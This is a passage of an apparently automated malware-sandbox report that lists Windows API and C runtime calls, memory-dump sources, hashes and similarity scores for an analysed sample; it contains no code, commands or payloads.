                                                                                                                                            • GetLastError.KERNEL32(?,0223D2A0,00000000,00000000,022369B1,?,?,00000000,00000000,00000001,00000000,00000000,?,022369B1,00000000,00000104), ref: 022368D5
                                                                                                                                            • __dosmaperr.LIBCMT ref: 022368DC
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.924566001.0000000002220000.00000040.00000001.sdmp, Offset: 02220000, based on PE: false
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ErrorFullLastNamePath__dosmaperr
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2398240785-0
                                                                                                                                            • Opcode ID: 7d495383b710f1faf093cc59933ccc85a4bded580e77670141baabca898ebb25
                                                                                                                                            • Instruction ID: d7d5dbde61d2107b9c54ace8efd4d4e05ebb96962e43fc24327e4548d235f6bf
                                                                                                                                            • Opcode Fuzzy Hash: 7d495383b710f1faf093cc59933ccc85a4bded580e77670141baabca898ebb25
                                                                                                                                            • Instruction Fuzzy Hash: 27F086B1611216BB8B321FE6DC08966FF6DFF457A03114121F918D7524D731E822DBE4
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • WriteConsoleW.KERNEL32(00403AF0,73B76490,0042CEB8,00000000,00403AF0,?,0041DE8F,00403AF0,00000001,00403AF0,00403AF0,?,004176EC,00000000,?,00403AF0), ref: 00420A5C
                                                                                                                                            • GetLastError.KERNEL32(?,0041DE8F,00403AF0,00000001,00403AF0,00403AF0,?,004176EC,00000000,?,00403AF0,00000000,00403AF0,?,00417C40,00403AF0), ref: 00420A68
                                                                                                                                              • Part of subcall function 00420A2E: CloseHandle.KERNEL32(FFFFFFFE,00420A78,?,0041DE8F,00403AF0,00000001,00403AF0,00403AF0,?,004176EC,00000000,?,00403AF0,00000000,00403AF0), ref: 00420A3E
                                                                                                                                            • ___initconout.LIBCMT ref: 00420A78
                                                                                                                                              • Part of subcall function 004209F0: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00420A1F,0041DE7C,00403AF0,?,004176EC,00000000,?,00403AF0,00000000), ref: 00420A03
                                                                                                                                            • WriteConsoleW.KERNEL32(00403AF0,73B76490,0042CEB8,00000000,?,0041DE8F,00403AF0,00000001,00403AF0,00403AF0,?,004176EC,00000000,?,00403AF0,00000000), ref: 00420A8D
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.922526659.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.922732648.0000000000431000.00000040.00020000.sdmp
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2744216297-0
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • _free.LIBCMT ref: 004146EA
                                                                                                                                              • Part of subcall function 004154C1: HeapFree.KERNEL32(00000000,00000000,?,0041B759,00000000,00000000,00000000,E80042EF,?,0041B780,00000000,00000007,00000000,?,0041BB82,00000000), ref: 004154D7
                                                                                                                                              • Part of subcall function 004154C1: GetLastError.KERNEL32(00000000,?,0041B759,00000000,00000000,00000000,E80042EF,?,0041B780,00000000,00000007,00000000,?,0041BB82,00000000,00000000), ref: 004154E9
                                                                                                                                            • _free.LIBCMT ref: 004146FD
                                                                                                                                            • _free.LIBCMT ref: 0041470E
                                                                                                                                            • _free.LIBCMT ref: 0041471F
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.922526659.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.922732648.0000000000431000.00000040.00020000.sdmp
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 776569668-0
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 0223A81E: GetOEMCP.KERNEL32(00000000,0223AA90,?,?,02232382,02232382,?), ref: 0223A849
                                                                                                                                            • _free.LIBCMT ref: 0223AAED
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.924566001.0000000002220000.00000040.00000001.sdmp, Offset: 02220000, based on PE: false
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _free
                                                                                                                                            • String ID: hdi
                                                                                                                                            • API String ID: 269201875-2356819157
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • GetOEMCP.KERNEL32(00000000,0041A840,00417373,00000000,?,?,00000000,?,00417373), ref: 0041A5F9
                                                                                                                                            • GetACP.KERNEL32(00000000,0041A840,00417373,00000000,?,?,00000000,?,00417373), ref: 0041A610
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.922526659.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.922732648.0000000000431000.00000040.00020000.sdmp
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: ssA
                                                                                                                                            • API String ID: 0-2889831464
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.922526659.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.922732648.0000000000431000.00000040.00020000.sdmp
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CommandLine
                                                                                                                                            • String ID: (5h
                                                                                                                                            • API String ID: 3253501508-675800470
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%